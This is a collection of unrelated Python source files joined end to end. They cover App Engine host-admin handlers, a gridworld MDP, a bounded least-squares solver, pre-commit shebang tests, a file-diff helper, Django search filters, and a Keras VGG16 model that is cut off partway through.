from error_message import ErrorMessages
import utils
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
JINJA_ENVIRONMENT = utils.getJinjaEnvironment()
class AddHost(webapp2.RequestHandler):
def get(self):
"""
descripion:
adds a new host to the database, and redirect to '/'
params:
name - host name
interval - pinging interval for all the links belonging to the host.
response:
redirect to '/admin'
"""
name = self.request.get('name')
if name is None or len(name) == 0:
showErrorPage(self, ErrorMessages.invalidHostName())
return
if ndb.Key('Host', name).get() is not None:
showErrorPage(self, ErrorMessages.duplicatingHostName())
return
try:
interval = int(self.request.get('interval'))
except ValueError:
showErrorPage(self, ErrorMessages.invalidHostInterval())
return
if interval == 0:
showErrorPage(self, ErrorMessages.invalidHostInterval())
return
addNewHost(name, interval)
self.redirect('/admin')
class DeleteHost(webapp2.RequestHandler):
def get(self):
"""
description:
deletes an existing host, and redirects to '/'. All the links belonging
to the host will also be deleted.
params:
name - host name
response:
redirect to '/'
"""
name = self.request.get('name')
if name is None or len(name) == 0:
showErrorPage(self, ErrorMessages.invalidHostName())
return
hostKey = ndb.Key('Host', name)
if hostKey.get() is None:
showErrorPage(self, ErrorMessages.hostDoesNotExist())
return
deleteLinksByHost(name)
deleteHost(name)
self.redirect('/')
class AdminPage(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
hosts = getAllHosts()
template_values = {
'hosts': hosts,
'user': user,
}
template = JINJA_ENVIRONMENT.get_template('admin.html')
self.response.write(template.render(template_values))
app = webapp2.WSGIApplication([
('/admin/host/add', AddHost),
('/admin/host/delete', DeleteHost),
], debug=True)
|
from mdp import MDP
from grid import Grid
from scipy.stats import uniform
from scipy.stats import beta
from scipy.stats import expon
import numpy as np
import random
import pyprind
import matplotlib.pyplot as plt
class GridWorld(MDP):
"""
Defines a gridworld environment to be solved by an MDP!
"""
def __init__(self, grid, goalVals, discount=.99, tau=.01, epsilon=.001):
MDP.__init__(self, discount=discount, tau=tau, epsilon=epsilon)
self.goalVals = goalVals
self.grid = grid
self.setGridWorld()
self.valueIteration()
self.extractPolicy()
def isTerminal(self, state):
"""
Specifies terminal conditions for gridworld.
"""
return True if tuple(self.scalarToCoord(state)) in self.grid.objects.values() else False
def isObstacle(self, sCoord):
"""
Checks if a state is a wall or obstacle.
"""
if tuple(sCoord) in self.grid.walls:
return True
if sCoord[0] > (self.grid.row - 1) or sCoord[0] < 0:
return True
if sCoord[1] > (self.grid.col - 1) or sCoord[1] < 0:
return True
return False
def takeAction(self, sCoord, action):
"""
Receives an action value, performs associated movement.
"""
if action is 0:
return self.up(sCoord)
if action is 1:
return self.down(sCoord)
if action is 2:
return self.left(sCoord)
if action is 3:
return self.right(sCoord)
if action is 4:
return sCoord
if action is 5:
return self.upleft(sCoord)
if action is 6:
return self.upright(sCoord)
if action is 7:
return self.downleft(sCoord)
if action is 8:
return self.downright(sCoord)
def up(self, sCoord):
"""
Move agent up, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] -= 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def upright(self, sCoord):
"""
Move agent up and right, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] -= 1
newCoord[1] += 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def upleft(self, sCoord):
"""
Move agent up and left, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] -= 1
newCoord[1] -= 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def down(self, sCoord):
"""
Move agent down, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] += 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def downleft(self, sCoord):
"""
Move agent down, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] += 1
newCoord[1] -= 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def downright(self, sCoord):
"""
Move agent down, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[0] += 1
newCoord[1] += 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def left(self, sCoord):
"""
Move agent left, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[1] -= 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def right(self, sCoord):
"""
Move agent right, uses state coordinate.
"""
newCoord = np.copy(sCoord)
newCoord[1] += 1
# Check if action takes you to a wall/obstacle
if not self.isObstacle(newCoord):
return newCoord
# You hit a wall, return original coord
else:
return sCoord
def coordToScalar(self, sCoord):
"""
Convert state coordinates to corresponding scalar state value.
"""
return sCoord[0]*(self.grid.col) + sCoord[1]
def scalarToCoord(self, scalar):
"""
Convert scalar state value into coordinates.
"""
return np.array([scalar / self.grid.col, scalar % self.grid.col])
def getPossibleActions(self, sCoord):
"""
Will return a list of all possible actions from a current state.
"""
possibleActions = list()
if self.up(sCoord) is not sCoord:
possibleActions.append(0)
if self.down(sCoord) is not sCoord:
possibleActions.append(1)
if self.left(sCoord) is not sCoord:
possibleActions.append(2)
if self.right(sCoord) is not sCoord:
possibleActions.append(3)
if self.upleft(sCoord) is not sCoord:
possibleActions.append(5)
if self.upright(sCoord) is not sCoord:
possibleActions.append(6)
if self.downleft(sCoord) is not sCoord:
possibleActions.append(7)
if self.downright(sCoord) is not sCoord:
possibleActions.append(8)
return possibleActions
def setGridWorld(self):
"""
Initializes states, actions, rewards, transition matrix.
"""
# Possible coordinate positions + Death State
self.s = np.arange(self.grid.row*self.grid.col + 1)
# 4 Actions {Up, Down, Left, Right}
self.a = np.arange(9)
# Reward Zones
self.r = np.zeros(len(self.s))
for i in range(len(self.grid.objects)):
self.r[self.coordToScalar(self.grid.objects.values()[i])] = self.goalVals[i]
self.r_sa = np.zeros([len(self.s),len(self.a)])
for i in range(len(self.s)):
for j in range(len(self.a)):
if j <= 4:
self.r_sa[i][j] = self.r[self.coordToScalar(self.takeAction(self.scalarToCoord(i),j))]-1.0
else:
self.r_sa[i][j] = self.r[self.coordToScalar(self.takeAction(self.scalarToCoord(i),j))]-np.sqrt(2)
self.r = self.r_sa
# Transition Matrix
self.t = np.zeros([len(self.s),len(self.a),len(self.s)])
for state in range(len(self.s)):
possibleActions = self.getPossibleActions(self.scalarToCoord(state))
if self.isTerminal(state):
for i in range(len(self.a)):
if i == 4:
self.t[state][4][state]=1.0
else:
self.t[state][i][len(self.s)-1] = 1.0
continue
for action in self.a:
# Up
if action == 0:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 0)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 1:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 1)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 2:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 2)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 3:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 3)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 4:
self.t[state][action][state] = 1.0
if action == 5:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 5)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 6:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 6)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 7:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 7)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
if action == 8:
currentState = self.scalarToCoord(state)
nextState = self.takeAction(currentState, 8)
self.t[state][action][self.coordToScalar(nextState)] = 1.0
def simulate(self, state):
"""
Runs the solver for the MDP, conducts value iteration, extracts policy,
then runs simulation of problem.
NOTE: Be sure to run value iteration (solve values for states) and to
extract some policy (fill in policy vector) before running simulation
"""
# Run simulation using policy until terminal condition met
actions = ['up', 'down', 'left', 'right']
count = 0
while not self.isTerminal(state):
# Determine which policy to use (non-deterministic)
policy = self.policy[np.where(self.s == state)[0][0]]
p_policy = self.policy[np.where(self.s == state)[0][0]] / \
self.policy[np.where(self.s == state)[0][0]].sum()
# Get the parameters to perform one move
stateIndex = np.where(self.s == state)[0][0]
policyChoice = np.random.choice(policy, p=p_policy)
actionIndex = np.random.choice(np.array(np.where(self.policy[state][:] == policyChoice)).ravel())
# print actionIndex
if actionIndex <= 3:
count += 1
else:
count += np.sqrt(2)
# Take an action, move to next state
nextState = self.takeAction(self.scalarToCoord(int(stateIndex)), int(actionIndex))
nextState = self.coordToScalar(nextState)
# print "In state: {}, taking action: {}, moving to state: {}".format(
# self.scalarToCoord(state), actions[actionIndex], self.scalarToCoord(nextState))
# End game if terminal state reached
state = int(nextState)
# if self.isTerminal(state):
# print "Terminal state: {} has been reached. Simulation over.".format(self.scalarToCoord(state))
return count
|
from fam.buffer import buffered_db
cache = buffered_db
|
"""
Created on Thu May 05 20:02:00 2011
@author: Tillsten
"""
import numpy as np
from scipy.linalg import qr
eps = np.finfo(float).eps
def mls(B, v, umin, umax, Wv=None, Wu=None, ud=None, u=None, W=None, imax=100):
"""
mls - Control allocation using minimal least squares.
[u,W,iter] = mls_alloc(B,v,umin,umax,[Wv,Wu,ud,u0,W0,imax])
Solves the bounded sequential least-squares problem
min ||Wu(u-ud)|| subj. to u in M
where M is the set of control signals solving
min ||Wv(Bu-v)|| subj. to umin <= u <= umax
using a two stage active set method. Wu must be diagonal since the
problem is reformulated as a minimal least squares problem. The
implementation does not handle the case of coplanar controls.
Inputs:
-------
B control effectiveness matrix (k x m)
v commanded virtual control (k x 1)
umin lower position limits (m x 1)
umax upper position limits (m x 1)
Wv virtual control weighting matrix (k x k) [I]
Wu control weighting matrix (m x m), diagonal [I]
ud desired control (m x 1) [0]
u0 initial point (m x 1)
W0 initial working set (m x 1) [empty]
imax max no. of iterations [100]
Outputs:
-------
u optimal control
W optimal active set
iter no. of iterations (= no. of changes in the working set + 1)
0 if u_i not saturated
Active set syntax: W_i = -1 if u_i = umin_i
+1 if u_i = umax_i
Directly Based on the code from:
Ola Harkegard, www.control.isy.liu.se/~ola
see licsence.
"""
#k = number of virtual controls
#m = number of variables (actuators)
k, m = B.shape
if u == None:
u = np.mean(umin + umax, 0)[:, None]
if W == None:
W = np.zeros((m, 1))
if ud == None:
ud = np.zeros((m, 1))
if Wu == None:
Wu = np.eye(m)
if Wv == None:
Wv = np.eye(k)
phase = 1
#Reformulate as a minimal least squares problem. See 2002-03-08 (1).
A = Wv.dot(B).dot(np.linalg.pinv(Wu))
b = Wv.dot(v - B.dot(ud))
xmin = (umin - ud).flatten()
xmax = (umax - ud).flatten()
# Compute initial point and residual.
x = Wu.dot(u - ud)
r = np.atleast_2d(A.dot(x) - b)
#Determine indeces of free variables
i_free = (W == 0).flatten()
m_free = np.sum(i_free)
for i in range(imax):
#print 'Iter: ', i
if phase == 1:
A_free = A[:, i_free]
if m_free <= k:
if m_free > 0:
p_free = np.linalg.lstsq(-A_free, r)[0]
else:
q1, r1 = qr(A_free.T)
p_free = -q1.dot(np.solve(r1.T, r))
p = np.zeros((m, 1))
if A.shape[1] > 1:
p[i_free] = p_free
else:
p[i_free] = p_free.flatten()
else:
i_fixed = np.logical_not(i_free)
m_fixed = m - m_free
if m_fixed > 0:
HT = U[i_fixed.squeeze(), :].T
V, Rtot = qr(np.atleast_2d(HT))
V1 = V[:, :m_fixed]
V2 = V[:, m_fixed + 1:]
R = Rtot[:, m_fixed]
else:
V, Rtot = np.array([[]]), np.array([[]])
V1 = V2 = R = V.T
s = -V2.T.dot(z)
pz = V2.dot(s)
p = U.dot(pz)
x_opt = x + p
infeasible = np.logical_or(x_opt < xmin, x_opt > xmax)
if not np.any(infeasible[i_free]):
x = x_opt
if phase == 1:
r = r + A.dot(p)
else:
z = z + pz
if phase == 1 and m_free >= k:
phase = 2
Utot, Stot = qr(A.T)
U = Utot[:, k:]
z = U.T.dot(x)
else:
lam = np.zeros((m, 1))
if m_free < m:
if phase == 1:
g = A.T.dot(r)
lam = -W * g
else:
lam[i_fixed] = -W[i_fixed] * np.linalg.solve(R, V1.T.dot(z))
if np.all(lam >= -eps):
u = np.linalg.solve(Wu, x) + ud
return u
lambda_neg, i_neg = np.min(lam), np.argmin(lam)
W[i_neg] = 0
i_free[i_neg] = True
m_free += 1
else:
dist = np.ones(m)
i_min = np.logical_and(i_free, p.flat < 0).flatten()
i_max = np.logical_and(i_free, p.flat > 0).flatten()
dist[i_min] = (xmin[i_min] - x[i_min]) / p[i_min]
dist[i_max] = (xmax[i_max] - x[i_max]) / p[i_max]
alpha, i_alpha = np.min(dist), np.argmin(dist)
x = x + alpha * p
if phase == 1:
r = r + A.dot(alpha * p) #!!
else:
z = z + alpha * pz
W[i_alpha] = np.sign(p[i_alpha])
if i_free[i_alpha]:
i_free[i_alpha] = False
m_free -= 1
u = np.linalg.solve(Wu, x) + ud
return u
def bounded_lsq(A, b, lower_lim, upper_lim):
"""
Minimizes:
|Ax-b|_2
for lower_lim<x<upper_lim.
"""
return mls(A, b, lower_lim, upper_lim)
def test_bounded_lsq():
from numpy.core.umath_tests import matrix_multiply
s = np.linspace(0, 10, 100)
A = np.exp(-((s - 5) ** 2) / 20)
A = A[:, None]
b = 16 * A
x = bounded_lsq(A, b, np.atleast_2d(0), np.atleast_2d(15))
np.testing.assert_almost_equal(x, 15)
A = np.array([[1, -3], [5, 7]])
b = np.array([[-50], [50]])
ll = np.array(([[-10], [-10]]))
ul = np.array(([[10], [10]]))
x0 = bounded_lsq(A, b, ll, ul)
np.testing.assert_array_almost_equal(x0, np.array([[-4.61538462], [10.]]))
if __name__ == '__main__':
from numpy.core.umath_tests import matrix_multiply
import matplotlib.pyplot as plt
test_bounded_lsq()
s = np.linspace(0, 10, 100)
A = np.exp(-((s - 5) ** 2) / 20)
A = A[:, None]
b = 16 * A
x = bounded_lsq(A, b, np.atleast_2d(0), np.atleast_2d(4))
plt.plot(A.dot(x))
plt.plot(b)
plt.figure()
plt.rcParams['font.family'] = 'serif'
A = np.array([[1, -3], [5, 7]])
b = np.array([[-50], [50]])
ll = np.array(([[-10], [-10]]))
ul = np.array(([[10], [10]]))
Ud = np.array(([0, 0]))
gamma = 1000
x0 = bounded_lsq(A, b, ll, ul)
x = np.linspace(-30, 30, 500)
y = np.linspace(-30, 30, 500)
X, Y = np.meshgrid(x, y)
S = np.dstack((X, Y))
SN = matrix_multiply(S, A.T)
plt.clf()
plt.contourf(x, y, np.sqrt(((SN - b.T) ** 2).sum(-1)), 30,
cmap=plt.cm.PuBu_r)
plt.colorbar()
#plt.axhline(ll[0])
#plt.axhline(ul[0])
#plt.axvline(ll[1])
#plt.axvline(ul[1])
rect = np.vstack((ll, ul - ll))
patch = plt.Rectangle(ll, *(ul - ll), facecolor=(0.0, 0., 0., 0))
plt.gca().add_patch(patch)
plt.annotate("Bounded Min",
xy=x0, xycoords='data',
xytext=(-5, 5), textcoords='data',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3"),
)
plt.annotate("Lsq Min",
xy=np.linalg.lstsq(A, b)[0], xycoords='data',
xytext=(20, 10), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc3"),
)
plt.scatter(*x0)
plt.scatter(*np.linalg.lstsq(A, b)[0])
plt.show()
|
from __future__ import annotations
import contextlib
import os.path
import shutil
import sys
import pytest
from pre_commit import parse_shebang
from pre_commit.envcontext import envcontext
from pre_commit.envcontext import Var
from pre_commit.util import make_executable
def _echo_exe() -> str:
exe = shutil.which('echo')
assert exe is not None
return exe
def test_file_doesnt_exist():
assert parse_shebang.parse_filename('herp derp derp') == ()
def test_simple_case(tmpdir):
x = tmpdir.join('f')
x.write('#!/usr/bin/env echo')
make_executable(x.strpath)
assert parse_shebang.parse_filename(x.strpath) == ('echo',)
def test_find_executable_full_path():
assert parse_shebang.find_executable(sys.executable) == sys.executable
def test_find_executable_on_path():
assert parse_shebang.find_executable('echo') == _echo_exe()
def test_find_executable_not_found_none():
assert parse_shebang.find_executable('not-a-real-executable') is None
def write_executable(shebang, filename='run'):
os.mkdir('bin')
path = os.path.join('bin', filename)
with open(path, 'w') as f:
f.write(f'#!{shebang}')
make_executable(path)
return path
@contextlib.contextmanager
def bin_on_path():
bindir = os.path.join(os.getcwd(), 'bin')
with envcontext((('PATH', (bindir, os.pathsep, Var('PATH'))),)):
yield
def test_find_executable_path_added(in_tmpdir):
path = os.path.abspath(write_executable('/usr/bin/env sh'))
assert parse_shebang.find_executable('run') is None
with bin_on_path():
assert parse_shebang.find_executable('run') == path
def test_find_executable_path_ext(in_tmpdir):
"""Windows exports PATHEXT as a list of extensions to automatically add
to executables when doing PATH searching.
"""
exe_path = os.path.abspath(
write_executable('/usr/bin/env sh', filename='run.myext'),
)
env_path = {'PATH': os.path.dirname(exe_path)}
env_path_ext = dict(env_path, PATHEXT=os.pathsep.join(('.exe', '.myext')))
assert parse_shebang.find_executable('run') is None
assert parse_shebang.find_executable('run', _environ=env_path) is None
ret = parse_shebang.find_executable('run.myext', _environ=env_path)
assert ret == exe_path
ret = parse_shebang.find_executable('run', _environ=env_path_ext)
assert ret == exe_path
def test_normexe_does_not_exist():
with pytest.raises(OSError) as excinfo:
parse_shebang.normexe('i-dont-exist-lol')
assert excinfo.value.args == ('Executable `i-dont-exist-lol` not found',)
def test_normexe_does_not_exist_sep():
with pytest.raises(OSError) as excinfo:
parse_shebang.normexe('./i-dont-exist-lol')
assert excinfo.value.args == ('Executable `./i-dont-exist-lol` not found',)
@pytest.mark.xfail(os.name == 'nt', reason='posix only')
def test_normexe_not_executable(tmpdir): # pragma: win32 no cover
tmpdir.join('exe').ensure()
with tmpdir.as_cwd(), pytest.raises(OSError) as excinfo:
parse_shebang.normexe('./exe')
assert excinfo.value.args == ('Executable `./exe` is not executable',)
def test_normexe_is_a_directory(tmpdir):
with tmpdir.as_cwd():
tmpdir.join('exe').ensure_dir()
exe = os.path.join('.', 'exe')
with pytest.raises(OSError) as excinfo:
parse_shebang.normexe(exe)
msg, = excinfo.value.args
assert msg == f'Executable `{exe}` is a directory'
def test_normexe_already_full_path():
assert parse_shebang.normexe(sys.executable) == sys.executable
def test_normexe_gives_full_path():
assert parse_shebang.normexe('echo') == _echo_exe()
assert os.sep in _echo_exe()
def test_normalize_cmd_trivial():
cmd = (_echo_exe(), 'hi')
assert parse_shebang.normalize_cmd(cmd) == cmd
def test_normalize_cmd_PATH():
cmd = ('echo', '--version')
expected = (_echo_exe(), '--version')
assert parse_shebang.normalize_cmd(cmd) == expected
def test_normalize_cmd_shebang(in_tmpdir):
echo = _echo_exe().replace(os.sep, '/')
path = write_executable(echo)
assert parse_shebang.normalize_cmd((path,)) == (echo, path)
def test_normalize_cmd_PATH_shebang_full_path(in_tmpdir):
echo = _echo_exe().replace(os.sep, '/')
path = write_executable(echo)
with bin_on_path():
ret = parse_shebang.normalize_cmd(('run',))
assert ret == (echo, os.path.abspath(path))
def test_normalize_cmd_PATH_shebang_PATH(in_tmpdir):
echo = _echo_exe()
path = write_executable('/usr/bin/env echo')
with bin_on_path():
ret = parse_shebang.normalize_cmd(('run',))
assert ret == (echo, os.path.abspath(path))
|
r"""
# .---. .-----------
# / \ __ / ------
# / / \( )/ ----- (`-') _ _(`-') <-. (`-')_
# ////// '\/ ` --- ( OO).-/( (OO ).-> .-> \( OO) ) .->
# //// / // : : --- (,------. \ .'_ (`-')----. ,--./ ,--/ ,--.' ,-.
# // / / / `\/ '-- | .---' '`'-..__)( OO).-. ' | \ | | (`-')'.' /
# // //..\\ (| '--. | | ' |( _) | | | | . '| |)(OO \ /
# ============UU====UU==== | .--' | | / : \| |)| | | |\ | | / /)
# '//||\\` | `---. | '-' / ' '-' ' | | \ | `-/ /`
# ''`` `------' `------' `-----' `--' `--' `--'
# ######################################################################################
#
# Author: edony - edonyzpc@gmail.com
#
# twitter : @edonyzpc
#
# Last modified: 2015-05-10 15:02
#
# Filename: filebuf.py
#
# Description: All Rights Are Reserved
#
"""
class PyColor(object):
""" This class is for colored print in the python interpreter!
"F3" call Addpy() function to add this class which is defined
in the .vimrc for vim Editor."""
def __init__(self):
self.self_doc = r"""
STYLE: \033['display model';'foreground';'background'm
DETAILS:
FOREGROUND BACKGOUND COLOR
---------------------------------------
30 40 black
31 41 red
32 42 green
33 43 yellow
34 44 blue
35 45 purple
36 46 cyan
37 47 white
DISPLAY MODEL DETAILS
-------------------------
0 default
1 highlight
4 underline
5 flicker
7 reverse
8 non-visiable
e.g:
\033[1;31;40m <!--1-highlight;31-foreground red;40-background black-->
\033[0m <!--set all into default-->
"""
self.warningcolor = '\033[0;37;41m'
self.tipcolor = '\033[0;31;42m'
self.endcolor = '\033[0m'
self._newcolor = ''
@property
def new(self):
"""
Customized Python Print Color.
"""
return self._newcolor
@new.setter
def new(self,color_str):
"""
New Color.
"""
self._newcolor = color_str
def disable(self):
"""
Disable Color Print.
"""
self.warningcolor = ''
self.endcolor = ''
class FileBuf(object):
"""
FILEBUF: class to write the each different lines into buffer file named `tmp`.
"""
def __init__(self, file1, file2):
"""
Initialize the instance attributes: [file1, file2, file1_line_num, file2_line_num]
"""
self.file1 = file1
self.file2 = file2
self.file1_line_num = len(open(self.file1).readlines())
self.file2_line_num = len(open(self.file2).readlines())
self.buffer = []
def mark_diff(self):
"""
Mark up the different lines into buffer
"""
f1 = open(self.file1)
f2 = open(self.file2)
if self.file1_line_num > self.file2_line_num:
line1_num_counter = 0
line2_num_counter = 0
for line1 in f1.readlines():
line2 = f2.readline()
line1_num_counter += 1
line2_num_counter += 1
if line1 == line2:
continue
else:
if line1 == '':
line1 = line1 + '\n'
if line2 == '':
line2 = line2 + '\n'
line1 = str(line1_num_counter) + '-' + line1
line2 = str(line2_num_counter) + '-' + line2
self.buffer.append(line1)
self.buffer.append(line2)
else:
line1_num_counter = 0
line2_num_counter = 0
for line2 in f2.readlines():
line1 = f1.readline()
line1_num_counter += 1
line2_num_counter += 1
if line1 == line2:
continue
else:
if line1 == '':
line1 = line1 + '\n'
if line2 == '':
line2 = line2 + '\n'
line1 = str(line1_num_counter) + '+' + line1
line2 = str(line2_num_counter) + '+' + line2
self.buffer.append(line1)
self.buffer.append(line2)
def write_file(self):
"""
Write the buffer into buffer file `tmp` in current direction
"""
file_write = open('tmp','w')
for line in self.buffer:
file_write.write(line)
if __name__ == '__main__':
test_file_buf = FileBuf('f2.txt', 'f1.txt')
test_file_buf.mark_diff()
test_file_buf.write_file()
|
from django.db.models import fields, ForeignKey, ManyToOneRel, OneToOneRel
from .obj_types import clss
from .search_schema import schema as search_schema
def build_search_filters(cls):
"""Return list of dicts of options for a QueryBuilder filter.
See https://querybuilder.js.org/#filters for details.
"""
filters = [
_build_search_filter(cls, field_name)
for field_name in search_schema[cls.obj_type]["fields"]
]
return filters
def _build_search_filter(cls, field_name):
if field_name == "bnf_code":
return _build_search_filter_bnf_code_prefox()
field = cls._meta.get_field(field_name)
builder = {
ForeignKey: _build_search_filter_fk,
ManyToOneRel: _build_search_filter_rev_fk,
OneToOneRel: _build_search_filter_rev_fk,
fields.CharField: _build_search_filter_char,
fields.DateField: _build_search_filter_date,
fields.BooleanField: _build_search_filter_boolean,
fields.DecimalField: _build_search_filter_decimal,
}[type(field)]
search_filter = builder(field)
search_filter["id"] = field_name
return search_filter
def _build_search_filter_bnf_code_prefox():
return {
"id": "bnf_code",
"type": "string",
"label": "BNF code",
"operators": ["begins_with", "not_begins_with"],
"validation": {"min": 4},
}
def _build_search_filter_fk(field):
values = field.related_model.objects.values_list("cd", "descr").order_by("descr")
values = [{r[0]: r[1]} for r in values]
# The type is "string", even though the values are actually integers. This is
# because the QueryBuilder library calls parseInt on any values produced by a filter
# of type "integer" (see call to Utils.changeType in getRuleInputValue). It turns
# out that parseInt cannot actually parse integers larger than
# Number.MAX_SAFE_INTEGER, which is (2 ** 53) - 1, or 9007199254740991, and loses
# precision when it tries. This is a problem, because certain dm+d models have
# identifiers larger than Number.MAX_SAFE_INTEGER. Fortunately, Django is able to
# deal with query parameters for integer fields that are submitted as strings.
return {
"type": "string",
"label": field.help_text,
"input": "select",
"values": values,
"operators": ["equal"],
"plugin": "selectpicker",
"plugin_config": {"liveSearch": True, "liveSearchStyle": "contains"},
}
def _build_search_filter_rev_fk(field):
intermediate_model = field.related_model
fk_fields = [
f
for f in intermediate_model._meta.get_fields()
if (
isinstance(f, ForeignKey)
and f.related_model not in clss
and "prev" not in f.name
)
]
assert len(fk_fields) == 1
field = fk_fields[0]
return _build_search_filter_fk(field)
def _build_search_filter_char(field):
return {
"type": "string",
"label": field.help_text,
"operators": ["contains"],
"validation": {"min": 3},
}
def _build_search_filter_date(field):
return {
"type": "date",
"label": field.help_text,
"operators": ["equal", "before", "after"],
"plugin": "datepicker",
"plugin_config": {"format": "yyyy-mm-dd"},
}
def _build_search_filter_boolean(field):
return {
"type": "boolean",
"label": field.help_text,
"input": "radio",
"values": [{1: "Yes"}, {0: "No"}],
"operators": ["equal"],
}
def _build_search_filter_decimal(field):
return {
"type": "double",
"label": field.help_text,
"operators": ["equal", "less than", "greater than"],
}
|
"""VGG16 model for Keras.
- [Very Deep Convolutional Networks for Large-Scale Image Recognition](https://arxiv.org/abs/1409.1556)
"""
from __future__ import print_function
from __future__ import absolute_import
import warnings
from keras.models import Model
from keras.layers import Flatten, Dense, Input,Lambda
from keras.layers import Convolution2D, MaxPooling2D
from keras.engine.topology import get_source_inputs
from keras.utils.layer_utils import convert_all_kernels_in_model
from keras.utils.data_utils import get_file
from keras import backend as K
import numpy as np
from keras.applications.imagenet_utils import decode_predictions, preprocess_input
TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.1/vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5'
vgg_mean = np.array([123.68, 116.779, 103.939], dtype=np.float32).reshape((3,1,1))
def img_preprocess(x):
x = x - vgg_mean
return x[:,::-1]
def VGG16(include_top=True, weights='imagenet',
input_tensor=None, input_shape=None,
classes=1000):
"""Instantiate the VGG16 architecture,
optionally loading weights pre-trained
on ImageNet. Note that when using TensorFlow,
for best performance you should set
`image_dim_ordering="tf"` in your Keras config
at ~/.keras/keras.json.
The model and the weights are compatible with both
TensorFlow and Theano. The dimension ordering
convention used by the model is the one
specified in your Keras config file.
# Arguments
include_top: whether to include the 3 fully-connected
layers at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `tf` dim ordering)
or `(3, 224, 244)` (with `th` dim ordering).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 48.
E.g. `(200, 200, 3)` would be one valid value.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
# Returns
A Keras model instance.
"""
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as imagenet with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
#input_shape = _obtain_input_shape(input_shape,
# default_size=224,
# min_size=48,
# dim_ordering=K.image_dim_ordering(),
# include_top=include_top)
# sandeep to fix later for now do this as topmodel is retained n theano
input_shape = (3,224,224)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
# Block 1
print("sandeep adding lambda layer buddy good luck ")
x = Lambda(img_preprocess,input_shape=(3,224,224),output_shape=(3,224,224))(img_input)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv1')(x)
x = Convolution2D(64, 3, 3, activation='relu', border_mode='same', name='block1_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block1_pool')(x)
# Block 2
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv1')(x)
x = Convolution2D(128, 3, 3, activation='relu', border_mode='same', name='block2_conv2')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
# Block 3
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv1')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv2')(x)
x = Convolution2D(256, 3, 3, activation='relu', border_mode='same', name='block3_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
# Block 4
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block4_conv3')(x)
